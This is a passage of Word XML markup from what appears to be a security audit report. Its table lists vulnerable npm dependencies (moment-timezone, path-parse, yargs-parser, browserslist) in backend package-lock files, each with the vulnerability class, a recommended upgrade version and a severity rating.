              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Transmission</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>of Information Issues</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:position w:val="7"/>
                <w:sz w:val="11"/>
              </w:rPr>
              <w:t>76</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
              <w:ind w:right="3405"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sdk-backend/package-lock.json app-backend/package-lock.json </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected Code:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="210" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"moment-timezone"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="32"/>
              <w:ind w:left="693"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="785CA2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"version"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:b/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>0.5.33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="33"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Solution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Upgrade</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>moment-timezone</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0.5.40</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2780" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="119"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId131">
              <w:r>
                <w:rPr>
                  <w:spacing w:val="-2"/>
                  <w:sz w:val="22"/>
                </w:rPr>
                <w:t>path-parse@1.0.6</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="119"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>by:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ReDoS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:position w:val="7"/>
                <w:sz w:val="11"/>
              </w:rPr>
              <w:t>77</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
              <w:ind w:right="3405"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sdk-backend/package-lock.json app-backend/package-lock.json </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected Code:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="324" w:lineRule="auto"/>
              <w:ind w:left="693" w:right="3106" w:hanging="594"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"node_modules/path-parse"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-25"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="785CA2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"version"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:b/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>1.0.6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="218" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Solution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Upgrade</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>path-parse</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1.0.7</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="37"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1900" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="114"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId132">
              <w:r>
                <w:rPr>
                  <w:spacing w:val="-2"/>
                  <w:sz w:val="22"/>
                </w:rPr>
                <w:t>yargs-parser@2.4</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="114"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>by:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Prototype</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Pollution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:position w:val="7"/>
                <w:sz w:val="11"/>
              </w:rPr>
              <w:t>78</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="16"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="17"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sdk-backend/package-lock.json</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Code:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="37"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"yargs-parser"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"^</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:b/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>2.4.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="33"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Solution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Upgrade</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>yargs-parser</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>21.1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1079" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="116"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId133">
              <w:r>
                <w:rPr>
                  <w:spacing w:val="-2"/>
                  <w:sz w:val="22"/>
                </w:rPr>
                <w:t>browserslist@4.16</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="116"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>by:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ReDoS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:position w:val="7"/>
                <w:sz w:val="11"/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="16"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="17"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sdk-backend/package-lock.json</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Code:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487606784">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>111442</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="57" name="Graphic 57"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
